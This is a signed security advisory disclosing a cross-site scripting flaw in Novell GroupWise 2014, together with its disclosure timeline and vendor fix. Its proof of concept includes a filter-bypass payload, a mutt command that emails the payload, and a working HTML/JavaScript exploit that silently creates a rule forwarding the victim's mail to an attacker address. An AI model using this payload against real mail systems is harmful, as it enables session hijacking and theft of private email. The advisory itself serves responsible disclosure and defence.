-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-021 
Product: GroupWise
Vendor: Novell
Affected Version(s): 2014
Tested Version(s): 2014
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2015-05-04
Solution Date: 2015-07-06
Public Disclosure: 2015-07-16
CVE Reference: Not yet assigned
Author of Advisory: Dr. Adrian Vollmer (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Novell GroupWise 2014 is an email web client which also features an
address book, a calendar and a task management tool. 

The vendor Novell describes the product as follows (see [1]):

"GroupWise 2014 gives employees robust email, calendaring, task management
and contact management tools wherever they wander. The same goes for admins,
who get streamlined, web-based administration and more to let them monitor,
manage and make things happen on the go."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Novell GroupWise 2014 is vulnerable to Cross Site Scripting attacks. In
combination, these vulnerabilities enable an attacker to perform various
actions in the context of the victim's session.  Sending a specially crafted
email to the victim leads to JavaScript code being executed upon opening.
This code can then send emails in the victim's name, create a rule to
forward all future incoming emails to an email address chosen by the
attacker, or possibly even forward existing emails in the victim's mailbox.

In particular, the filter that is supposed to remove malicious code can be
bypassed by appending an invalid attribute to the actual attribute of an
HTML tag without using a separating space like this:

    <body o=''onload=alert('XSS')>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following command sends an email to a victim that will, when opened,
create a new rule to forward all future emails addressed to the victim to
evil@attacker.invalid.

    mutt -e "set content_type=text/html" victim@groupwise-webapp.com -s "Re: Pentest" < payload.html

The content of the file payload.html is:

    <html>
    <body o=''onload="document.getElementById('usercontext').setAttribute('value',window.location.pathname.split('/')[3]);var f=document.createElement('iframe');f.style='display:none';f.name='csrf-frame';document.body.appendChild(f);alert('Creating forwarding rule...');document.getElementById('Form').submit()">

    Lorem ipsum dolor

        <form id="Form" action="https://vulnerable.groupwise-webapp.com/gw/webacc" method="POST" target="csrf-frame">
          <input id="usercontext" type="hidden" name="User&#46;context" value="" />
          <input type="hidden" name="action" value="Rule&#46;Create" />
          <input type="hidden" name="Rule&#46;type" value="Forward" />
          <input type="hidden" name="Compose&#46;id" value="" />
          <input type="hidden" name="merge" value="ruleadd" />
          <input type="hidden" name="error" value="ruleadd" />
          <input type="hidden" name="Url&#46;Rule&#46;Action" value="1" />
          <input type="hidden" name="Rule&#46;name" value="newautomatedrule" />
          <input type="hidden" name="RuleConditionfield" value="To" />
          <input type="hidden" name="RuleConditioncondition" value="Contains" />
          <input type="hidden" name="RuleConditiontext" value="Forward" />
          <input type="hidden" name="Item&#46;toName" value="evil&#64;attacker&#46;invalid" />
          <input type="hidden" name="Item&#46;to" value="evil&#64;attacker&#46;invalid" />
          <input type="hidden" name="Item&#46;ccName" value="" />
          <input type="hidden" name="Item&#46;cc" value="" />
          <input type="hidden" name="Item&#46;bcName" value="" />
          <input type="hidden" name="Item&#46;bc" value="" />
          <input type="hidden" name="Item&#46;subject" value="" />
          <input type="hidden" name="Rule&#46;subjectPrefix" value="Fwd&#58;" />
          <input type="hidden" name="Item&#46;message" value="" />
          <input type="hidden" name="Rule&#46;Create" value="" />
        </form>
      </body>
    </html>

The number of the array element (here: 3) may be dependent on the particular
installation and configuration of GroupWise. It refers to the part in the
URL which represents the "User.context", a parameter resembling an anti-CSRF
token which is transmitted as a GET parameter.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Apply the Support Pack 2 provided by Novell.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-04-28: Vulnerability discovered
2015-05-04: Vendor notified
2015-05-11: Vendor notified a second time
2015-05-12: Vendor acknowledged notification
2015-07-06: Vendor published patch 
2015-07-16: Advisory published

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web Site for Novell GroupWise 2014
    https://www.novell.com/products/groupwise/
[2] SySS Policy for Responsible Disclosure 
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Dr. Adrian Vollmer of the SySS GmbH.

E-Mail: adrian.vollmer@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Adrian_Vollmer.asc
Key ID: 0x037C9FE7
Key Fingerprint: 70CF E88C AEE7 DB0F 5DC8  3403 0E02 7C7E 037C 9FE7

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJVqKdgAAoJEA4CfH4DfJ/nz5sP/2kQV0m7LEfHYR5i8W+zq2zW
i5WnJCKzSRAeUH7T7zONeXWdC3qdkwXzUnLdLlncJNgnmaJy3i5m3x3+4ZySrREB
nrrv1Cfl0U1rfhqpXiKjP+P8Tvr4kJB1qmd5VYpUPfrPcM4XtinGuuAKyOo99ewR
yxnwHK2MqUDM9ZnP90hAkwoTCoBCk7iU64okSasfU/jwK3KKUXl/iNyjBiSGHt7r
lYXTjvQsIWRrhSeJkGUCKmr29NeD3iqN/28gpMYUS7Ce7nRhwiKScipFkrcHLOW1
YDhAaivg0gYzTL2WFczxnQnFxyBvzqUIGSJvGOsdbDT3xcrYaqbEhC75CsuTQ0zS
bVbcmgTNIRxqfTyCR4foXp8HJJVZVV3YFdirPuQXUZJ2VIlUA26pHneFoKQ4AjR1
hZiv3AF15oG6EYHaK9jnoMWirBQVg+p2pcB6ysuZMqB7PzE/xj+lDi+yoAg8wAcv
TiQwL4z01RQ2755LYWNUwV95zwuJbR9oSrdM9GxV2damn3B2vbLAqAc3B91PjWiF
x6YurkuS1K4cxDssWhUYsG8MnTk93J6WvmK5yq6Q8q3AyfNTborJHXPWhn5EiWaR
Vs3jYBLK2w5RDaZkcmv8sboe5tP+PWue3ZkDk1YOv77WssR8H9Zw0QZhoVE86iEI
72qVznwtS+OrwnbJPGv/
=D9K4
-----END PGP SIGNATURE-----